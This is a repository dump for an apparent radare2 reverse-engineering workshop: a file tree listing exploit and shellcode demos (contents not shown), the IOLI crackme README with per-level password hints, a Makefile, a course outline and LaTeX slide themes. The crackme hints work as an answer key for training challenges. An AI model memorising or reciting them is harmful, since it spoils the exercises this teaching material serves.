├── .gitignore ├── IOLI-crackme ├── 2015_FLAREOn_Challenges.zip ├── README.txt ├── bin-linux │ ├── crackme0x00 │ ├── crackme0x01 │ ├── crackme0x02 │ ├── crackme0x03 │ ├── crackme0x04 │ ├── crackme0x05 │ ├── crackme0x06 │ ├── crackme0x07 │ ├── crackme0x08 │ └── crackme0x09 ├── bin-pocketPC │ ├── crackme0x00.arm.exe │ ├── crackme0x01.arm.exe │ ├── crackme0x02.arm.exe │ ├── crackme0x03.arm.exe │ ├── crackme0x04.arm.exe │ ├── crackme0x05.arm.exe │ ├── crackme0x06.arm.exe │ ├── crackme0x07.arm.exe │ ├── crackme0x08.arm.exe │ └── crackme0x09.arm.exe └── bin-win32 │ ├── crackme0x00.exe │ ├── crackme0x01.exe │ ├── crackme0x02.exe │ ├── crackme0x03.exe │ ├── crackme0x04.exe │ ├── crackme0x05.exe │ ├── crackme0x06.exe │ ├── crackme0x07.exe │ ├── crackme0x08.exe │ └── crackme0x09.exe ├── Makefile ├── README.md ├── beamercolorthememetropolis.sty ├── beamerfontthememetropolis.sty ├── beamerinnerthememetropolis.sty ├── beamerouterthememetropolis.sty ├── beamerthemem.sty ├── ccicons.sty ├── demos ├── Exploit │ ├── commands.md │ ├── pwn1 │ │ ├── exploit.py │ │ ├── pwn1 │ │ └── pwn1.c │ ├── pwn2 │ │ ├── exploit.py │ │ ├── pwn2 │ │ ├── pwn2.c │ │ └── you │ └── ropasaurus │ │ ├── exploit1.py │ │ ├── exploit2.py │ │ ├── exploit3.py │ │ ├── notes.md │ │ ├── original │ │ ├── patched │ │ └── readgot.py ├── Firmware │ ├── demo1_arm_boot │ │ ├── .gdb_history │ │ ├── connect_r2.sh │ │ ├── cortex_A8.idc │ │ ├── idc2r.py │ │ ├── mbmloader-1.raw │ │ ├── motorola-crypto.py │ │ ├── omap3430.idc │ │ ├── omap3430_boot.r2 │ │ ├── omap3430_boot_rom.idc │ │ ├── omap3430_boot_rom.r2 │ │ ├── omap3430_boot_rom_14.57.idb │ │ ├── omap3430_boot_rom_14.57.idc │ │ ├── omap3430_boot_rom_14.57.lst │ │ ├── omap3430_boot_rom_14.57.r2 │ │ ├── omap3430_boot_rom_14.57_2.r2 │ │ ├── omap3430_boot_rom_14.57_allinfo.idc │ │ ├── omap_3430.bin │ │ ├── run_qemu.sh │ │ └── run_r2.sh │ ├── demo3_x86_legacy │ │ ├── asrock_p4i65g.bin │ │ ├── asrock_p4i65g.h │ │ └── asrock_p4i65g.r2 │ ├── demo3_x86_uefi │ │ ├── Asus_937_12sec_dmienbg64.efi │ │ ├── CpuPei.efi │ │ ├── NTFS.efi │ │ ├── PchInit.pe │ │ ├── PchMeUma.efi │ │ ├── S3Restore.efi │ │ ├── SomeUefiFile.bin │ │ ├── efiguids.py │ │ ├── example.te │ │ ├── hp_image.bin │ │ ├── hp_image_2.bin │ │ └── search_guids.py │ └── demo5_it8502e │ │ ├── ITE_IT8502E_F_G_V0_7_7_09042008_1COM.pdf │ │ ├── idc2r.py │ │ ├── ite_it8502.asm │ │ ├── ite_it8502.lst │ │ ├── ite_it8502.r2 │ │ ├── ite_it8502.rom │ │ ├── ite_it8502_from_ida.r2 │ │ ├── ite_it8502e.idb │ │ ├── ite_it8502e.idc │ │ └── run_r2.sh └── others │ └── pfvdemo ├── drawstack.sty ├── nocd ├── AoE.zip ├── Makefile ├── beamercolorthememetropolis.sty ├── beamerfontthememetropolis.sty ├── beamerthemem.sty ├── pix │ ├── aoe.jpg │ ├── crack.png │ ├── ii.png │ ├── script.png │ └── x230.png ├── slides.pdf └── slides.tex ├── pe_certificate ├── pgfplotsthemetol.sty ├── pix ├── GOT.png ├── binsh.png ├── bruijn.png ├── code.png ├── crimages │ ├── bin-info.png │ ├── bof1.png │ ├── peda_context.png │ ├── poppopret.png │ ├── r2_context1.png │ └── shellcode.png ├── diff.png ├── exploit_pwn1.png ├── exploit_pwn2.png ├── got.png ├── libc.png ├── overflow1.png ├── overflow2.png ├── overflow3.png ├── plt_after.png ├── plt_before.png ├── ppp.png ├── pppr.png ├── pwn1_shellcode.png ├── pwn2.png ├── r2-nativedebug.png ├── radiff2.png ├── regstacklisting.png ├── rop.png ├── rop_pwn1.png ├── segfault_pwn1.png ├── socat.png ├── system_offset.png ├── web.png ├── writable.png └── you.png ├── pwns ├── bof │ └── bof │ │ ├── bof │ │ ├── bof.c │ │ ├── bof.rr2 │ │ ├── pattern.txt │ │ ├── profile │ │ ├── pwn.rb │ │ ├── shoe.rb │ │ └── slide.txt ├── magic │ ├── demo.c │ ├── pwn.rb │ └── shoe.rb ├── rop │ ├── pwn.rb │ ├── ropasaurusrex │ └── shoe.rb └── shellcode │ ├── binsh.elf │ └── binsh.r ├── refs.bib ├── shikata_ga_nai ├── Makefile ├── beamercolorthememetropolis.sty ├── beamerfontthememetropolis.sty ├── beamerinnerthememetropolis.sty ├── beamerouterthememetropolis.sty ├── beamerthemem.sty ├── execve.shellcode ├── hello.py ├── pix │ ├── description.png │ ├── esil.png │ ├── fpu.png │ ├── fpus.png │ ├── r2pipe.png │ └── solution.png ├── shellcode.shikata_ga_nai ├── shikataganai.py ├── slides.pdf ├── slides.tex └── test_fpu.py ├── slides.pdf └── slides.tex /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by https://www.gitignore.io 2 | 3 | ### LaTeX ### 4 | *.acn 5 | *.acr 6 | *.alg 7 | *.aux 8 | *.bbl 9 | *.bcf 10 | *.blg 11 | *.dvi 12 | *.fdb_latexmk 13 | *.glg 14 | *.glo 15 | *.gls 16 | *.idx 17 | *.ilg 18 | *.ind 19 | *.ist 20 | *.lof 21 | *.log 22 | *.lot 23 | *.maf 24 | *.mtc 25 | *.mtc0 26 | *.nav 27 | *.nlo 28 | *.out 29 | *.pdfsync 30 | *.ps 31 | *.run.xml 32 | *.snm 33 | *.synctex.gz 34 | *.toc 35 | *.vrb 36 | *.xdy 37 | *.tdo 38 | 39 | ### Vim ### 40 | *.swp 41 | *.un~ 42 | 43 | -------------------------------------------------------------------------------- /IOLI-crackme/2015_FLAREOn_Challenges.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/2015_FLAREOn_Challenges.zip -------------------------------------------------------------------------------- /IOLI-crackme/README.txt: -------------------------------------------------------------------------------- 1 | ======================= IOLI CRACKME v1.2 by pof ======================= 2 | 3 | [Goal] 4 | Crack the executable files to accept any password 5 | 6 | 7 | [Hints] 8 | Level 0x00: strings is your friend 9 | Level 0x01: 5274 10 | Level 0x02: ((10*9)+(123*4))^2 11 | Level 0x03: same password as in level 0x02 12 | Level 0x04: 9+6=15 - try 69 13 | Level 0x05: 9+7=16 but one is not enough - try 970 14 | Level 0x06: same algorithm as in 5, but envp LOLO=1 15 | Level 0x07: if you find this level too difficult, try the next 16 | one and then come back 17 | Level 0x08: same algorithm as in 0x06 18 | 19 | 20 | [Tools] 21 | strings 22 | Displays printable strings in files 23 | included in all linux distributions 24 | http://sources.redhat.com/binutils/ 25 | 26 | HT Editor 27 | File editor/viewer/analyzer for executables. 28 | sudo apt-get install ht 29 | http://hte.sourceforge.net/ 30 | 31 | radare 32 | Complete toolchain for working with binary files 33 | http://radare.nopcode.org/ 34 | 35 | IDA Pro 36 | Interactive multi-processor disassembler and debuger 37 | http://www.datarescue.com/idabase/ 38 | 39 | ======================================================================== 40 | [EOF] 41 | -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x00: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x00 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x01: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x01 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x02: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x02 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x03: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x03 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x04: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x04 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x05: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x05 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x06: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x06 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x07: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x07 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x08: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x08 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x09: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x09 -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x00.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x00.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x01.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x01.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x02.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x02.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x03.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x03.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x04.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x04.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x05.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x05.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x06.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x06.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x07.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x07.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x08.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x08.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x09.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x09.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x00.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x00.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x01.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x01.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x02.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x02.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x03.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x03.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x04.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x04.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x05.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x05.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x06.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x06.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x07.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x07.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x08.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x08.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x09.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x09.exe -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | all: slides 2 | 3 | slides: slides.tex 4 | xelatex slides.tex 5 | xelatex $< -o slides.pdf 6 | rm -f *.aux *.snm *.toc *.log *.nax *.out 7 | #evince slides.pdf 8 | 9 | slides-bib: slides.tex 10 | pdflatex slides.tex 11 | biber slides 12 | pdflatex $< -o slides.pdf 13 | rm -f *.aux *.snm *.toc *.log *.naz *.out 14 | 15 | clean: 16 | rm -f *.aux *.snm *.toc *.log *.nax *.out *.nav 17 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Workshop2015 2 | 3 | TOC 4 | 5 | Part 0. Intro to the radare world (45 min + 15 min practice) 6 | ================================= 7 | 8 | 0.0 - Generality on radare2 framework 9 | 1.1 - Utility toolsuit 10 | 2.1 - Radare2 - Generalities 11 | 2.2 - Radare2 - Printing 12 | 2.3 - Radare2 - Info Commands 13 | 2.4 - Radare2 - Search 14 | 2.5 - Analysis 15 | 2.6 - Visual Mode(s) 16 | 2.7 - Student Practices - IOLI Set - Questions/Answers 17 | 18 | Part I. Static analysis (1 hour 30 minutes) 19 | ======================= 20 | 21 | Chapter 1. Malware (45 minutes) 22 | ------------------ 23 | 1.1 Windows malware example 24 | 1.2 Linux malware example 25 | 26 | Chapter 2. Firmware (45 minutes) 27 | ------------------- 28 | 2.1. General MIPS router firmware unpacking (15 minutes) 29 | Showing low-hanging vulnerabilities in a classic SOHO router. 30 | 31 | 2.2 General ARM firmware analysis - bootloaders and android 32 | executables (15 minutes) 33 | - Texas Instruments bootrom analysis 34 | - Qualcomm TrustZone analysis 35 | - One of Android executables 36 | 37 | 2.3 HDD firmware analysis (15 minutes) 38 | - Seagate firmware unpacking and disassembling 39 | 40 | Chapter 3. Practice (30 minutes) 41 | ------------------- 42 | 43 | Part II Debugging - (40 minutes) 44 | ================= 45 | 46 | Chapter 1. General techniques (30 minutes) 47 | ----------------------------- 48 | 1.1 gdb (10 minutes) 49 | Since the current native debugger is not perfect (it will be the focus 50 | for the next release), 51 | Radare2 can use gdb as a backend to debug processes. 52 | 53 | 1.2 native (10 minutes) 54 | We'll show basic on-host debugging case, when you are brave enough 55 | to debug executable (or even malware) directly on your machine. 56 | Also: 57 | - rarun2 - setup execution environment for a program (chroot, 58 | parameters, env, etc.) 59 | - remote r2 debugging r2 -c=h && r2 -C http://.../cmd/ 60 | 61 | 1.3 WinDbg and PDB (10 minutes) 62 | Essential part for the windows debuggind is loading PDB files, 63 | especially for Windows drivers. 64 | 65 | Chapter 2. Firmware (10 minutes) 66 | ------------------- 67 | 2.1 qemu (10 minutes) 68 | Using embedded gdbserver to debug x86 bootloader/bios/uefi, 69 | and arm bootloader (see Part II, 2.2 section) 70 | 71 | Part III Scripting (1 hour) 72 | ================== 73 | 74 | Chapter 1. Radare2 script (15 minutes) 75 | ------------------------- 76 | Basic scripting, pipelining radare2 commands, without any external plugins. 77 | Using python plugins, high-level analysis using python bindings 78 | 79 | Chapter 2. Scripting with r2pipe (30 minutes) 80 | -------------------------------- 81 | Using r2pipe for scripting with python, javascript. 82 | 83 | Chapter 3. Python bindings (15 minutes) 84 | -------------------------- 85 | Using 'classic' and 'ctypes' python bindings for the radare2 library 86 | 87 | Part IV ESIL (1 hour) 88 | ============ 89 | 90 | ESIL is an Evaluateable String Intermediate Language 91 | 92 | Chapter 1. Small ESIL introduction 93 | ---------------------------------- 94 | ESIL syntax, opcodes, sources of the ESIL analysis 95 | 96 | Chapter 2. ESIL emulation 97 | ------------------------- 98 | Using ESIL for the emulation, without qemu/bochs/vbox needed 99 | 100 | Chapter 3. ESIL to REIL conversion 101 | ---------------------------------- 102 | To be able to use already existing tools based on REIL 103 | 104 | THE END 105 | -------------------------------------------------------------------------------- /beamercolorthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamercolorthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamercolorthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamercolorthememetropolis}[2015/06/12 Metropolis color theme] 21 | \RequirePackage{pgfopts} 22 | \pgfkeys{ 23 | /metropolis/color/block/.cd, 24 | .is choice, 25 | transparent/.code=\@metropolis@block@transparent, 26 | fill/.code=\@metropolis@block@fill, 27 | } 28 | \pgfkeys{ 29 | /metropolis/color/background/.cd, 30 | .is choice, 31 | dark/.code=\@metropolis@colors@dark, 32 | light/.code=\@metropolis@colors@light, 33 | } 34 | \newcommand{\@metropolis@color@setdefaults}{ 35 | \pgfkeys{/metropolis/color/.cd, 36 | background=light, 37 | block=transparent, 38 | } 39 | } 40 | \definecolor{mDarkBrown}{HTML}{604c38} 41 | \definecolor{mDarkTeal}{HTML}{23373b} 42 | \definecolor{mLightBrown}{HTML}{EB811B} 43 | \definecolor{mLightGreen}{HTML}{14B03D} 44 | \newcommand{\@metropolis@colors@dark}{ 45 | \setbeamercolor{normal text}{% 46 | fg=black!2, 47 | bg=mDarkTeal 48 | } 49 | } 50 | \newcommand{\@metropolis@colors@light}{ 51 | \setbeamercolor{normal text}{% 52 | fg=mDarkTeal, 53 | bg=black!2 54 | } 55 | } 56 | \setbeamercolor{alerted text}{% 57 | fg=mLightBrown 58 | } 59 | \setbeamercolor{example text}{% 60 | fg=mLightGreen 61 | } 62 | \setbeamercolor{titlelike}{use=normal text, parent=normal text} 63 | \setbeamercolor{author}{use=normal text, parent=normal text} 64 | \setbeamercolor{date}{use=normal text, parent=normal text} 65 | \setbeamercolor{institute}{use=normal text, parent=normal text} 66 | \setbeamercolor{structure}{use=normal text, fg=normal text.fg} 67 | \setbeamercolor{palette primary}{% 68 | use=normal text, 69 | fg=normal text.bg, 70 | bg=normal text.fg 71 | } 72 | \setbeamercolor{frametitle}{% 73 | use=palette primary, 74 | parent=palette primary 75 | } 76 | \setbeamercolor{progress bar}{% 77 | use=alerted text, 78 | fg=alerted text.fg, 79 | bg=normal text.bg!50!normal text.fg 80 | } 81 | \setbeamercolor{title separator}{ 82 | use=progress bar, 83 | parent=progress bar 84 | } 85 | \setbeamercolor{progress bar in head/foot}{% 86 | use=progress bar, 87 | parent=progress bar 88 | } 89 | \setbeamercolor{progress bar in section page}{ 90 | use=progress bar, 91 | parent=progress bar 92 | } 93 | \newcommand{\@metropolis@block@transparent}{ 94 | \setbeamercolor{block title}{use=normal text, parent=normal text} 95 | } 96 | \newcommand{\@metropolis@block@fill}{ 97 | \setbeamercolor{block title}{% 98 | use=normal text, 99 | fg=normal text.fg, 100 | bg=normal text.bg!80!fg 101 | } 102 | } 103 | \setbeamercolor{block title alerted}{% 104 | use={block title, alerted text}, 105 | bg=block title.bg, 106 | fg=alerted text.fg 107 | } 108 | \setbeamercolor{block title example}{% 109 | use={block title, example text}, 110 | bg=block title.bg, 111 | fg=example text.fg 112 | } 113 | \setbeamercolor{block body alerted}{use=block body, parent=block body} 114 | \setbeamercolor{block body example}{use=block body, parent=block body} 115 | \setbeamercolor{block body}{ 116 | use={block title, normal text}, 117 | bg=block title.bg!50!normal text.bg 118 | } 119 | \setbeamercolor{footnote}{fg=normal text.fg!90} 120 | \setbeamercolor{footnote mark}{fg=.} 121 | \@metropolis@color@setdefaults 122 | \ProcessPgfPackageOptions{/metropolis/color} 123 | \mode 124 | \endinput 125 | %% 126 | %% End of file `beamercolorthememetropolis.sty'. 127 | -------------------------------------------------------------------------------- /beamerfontthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerfontthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerfontthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerfontthememetropolis}[2015/06/12 Metropolis font theme] 21 | \RequirePackage[no-math]{fontspec} 22 | \defaultfontfeatures{Mapping=tex-text} 23 | \setsansfont[BoldItalicFont={Fira Sans Italic},% 24 | ItalicFont={Fira Sans Light Italic},% 25 | BoldFont={Fira Sans}]{Fira Sans Light} 26 | \setmonofont{Fira Mono} 27 | \newfontfamily\ExtraLight{Fira Sans ExtraLight} 28 | \newfontfamily\Light{Fira Sans Light} 29 | \newfontfamily\Book{Fira Sans} 30 | \newfontfamily\Medium{Fira Sans Medium} 31 | \AtBeginEnvironment{tabular}{% 32 | \setsansfont[BoldFont={Fira Sans},% 33 | Numbers={Monospaced}]{Fira Sans Light}% 34 | } 35 | \setbeamerfont{title}{family=\Book, size=\Large, shape=\scshape} 36 | \setbeamerfont{author}{family=\ExtraLight, size=\small} 37 | \setbeamerfont{date}{family=\ExtraLight, size=\small} 38 | \setbeamerfont{section title}{family=\Book, size=\Large, shape=\scshape} 39 | \setbeamerfont{block title}{family=\Book, size=\normalsize} 40 | \setbeamerfont{block title alerted}{family=\Book,size=\normalsize} 41 | \setbeamerfont{subtitle}{family=\Light, size=\fontsize{12}{14}} 42 | \setbeamerfont{frametitle}{family=\Book, size=\large, shape=\scshape} 43 | \setbeamerfont{caption}{size=\small} 44 | \setbeamerfont{caption name}{family=\Book} 45 | \setbeamerfont{description item}{family=\Book} 46 | \setbeamerfont{page number in head/foot}{size=\scriptsize} 47 | \setbeamerfont{bibliography entry author}{family=\Light, size=\normalsize} 48 | \setbeamerfont{bibliography entry title}{family=\Book, size=\normalsize} 49 | \setbeamerfont{bibliography entry location}{family=\Light, size=\normalsize} 50 | \setbeamerfont{bibliography entry note}{family=\Light, size=\small} 51 | \linespread{1.15} 52 | 53 | \endinput 54 | %% 55 | %% End of file `beamerfontthememetropolis.sty'. 56 | -------------------------------------------------------------------------------- /beamerinnerthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerinnerthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerinnerthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerinnerthememetropolis}[2015/06/12 Metropolis inner theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{calc} 23 | \RequirePackage{pgfopts} 24 | \RequirePackage{tikz} 25 | \pgfkeys{ 26 | /metropolis/inner/block/.cd, 27 | .is choice, 28 | transparent/.code=\setlength{\@metropolis@blockskip}{0ex}, 29 | fill/.code=\setlength{\@metropolis@blockskip}{1ex}, 30 | } 31 | \pgfkeys{ 32 | /metropolis/inner/titleformat/.cd, 33 | .is choice, 34 | regular/.code=\renewcommand{\@metropolis@titleformat}{}, 35 | lowercase/.code={% 36 | \renewcommand{\@metropolis@titleformat}{\MakeLowercase} 37 | }, 38 | uppercase/.code={% 39 | \renewcommand{\@metropolis@titleformat}{\MakeUppercase} 40 | }, 41 | } 42 | \pgfkeys{ 43 | /metropolis/inner/sectiontitleformat/.cd, 44 | .is choice, 45 | regular/.code=\renewcommand{\@metropolis@sectiontitleformat}{}, 46 | lowercase/.code={% 47 | \renewcommand{\@metropolis@sectiontitleformat}{\MakeLowercase} 48 | }, 49 | uppercase/.code={% 50 | \renewcommand{\@metropolis@sectiontitleformat}{\MakeUppercase} 51 | }, 52 | } 53 | \pgfkeys{ 54 | /metropolis/inner/sectionpage/.cd, 55 | .is choice, 56 | none/.code=\@metropolis@sectionpage@none, 57 | progressbar/.code=\@metropolis@sectionpage@progressbar, 58 | } 59 | \newcommand{\@metropolis@inner@setdefaults}{ 60 | \pgfkeys{/metropolis/inner/.cd, 61 | sectionpage=progressbar, 62 | block=transparent, 63 | titleformat=lowercase, 64 | sectiontitleformat=lowercase, 65 | } 66 | } 67 | \def\@metropolis@titleformat#1{#1} 68 | \def\@metropolis@sectiontitleformat#1{#1} 69 | \patchcmd{\sectionentry} 70 | {\def\insertsectionhead{#2}} 71 | {\def\insertsectionhead{\@metropolis@sectiontitleformat{#2}}} 72 | {} 73 | {\PackageError{beamerinnerthememetropolis}{Patching section title failed.}} 74 | \patchcmd{\beamer@section} 75 | {\def\insertsectionhead{\hyperlink{Navigation\the\c@page}{#1}}} 76 | {\def\insertsectionhead{\hyperlink{Navigation\the\c@page}{\@metropolis@sectiontitleformat{#1}}}} 77 | {} 78 | {\PackageError{beamerinnerthememetropolis}{Patching section title failed.}} 79 | \setbeamertemplate{title page}{ 80 | \begin{minipage}[b][\paperheight]{\textwidth} 81 | \ifx\inserttitlegraphic\@empty\else\usebeamertemplate*{title graphic}\fi 82 | \vfill% 83 | \ifx\inserttitle\@empty\else\usebeamertemplate*{title}\fi 84 | \ifx\insertsubtitle\@empty\else\usebeamertemplate*{subtitle}\fi 85 | \usebeamertemplate*{title separator} 86 | \ifx\beamer@shortauthor\@empty\else\usebeamertemplate*{author}\fi 87 | \ifx\insertdate\@empty\else\usebeamertemplate*{date}\fi 88 | \ifx\insertinstitute\@empty\else\usebeamertemplate*{institute}\fi 89 | \vfill 90 | \vspace*{1mm} 91 | \end{minipage} 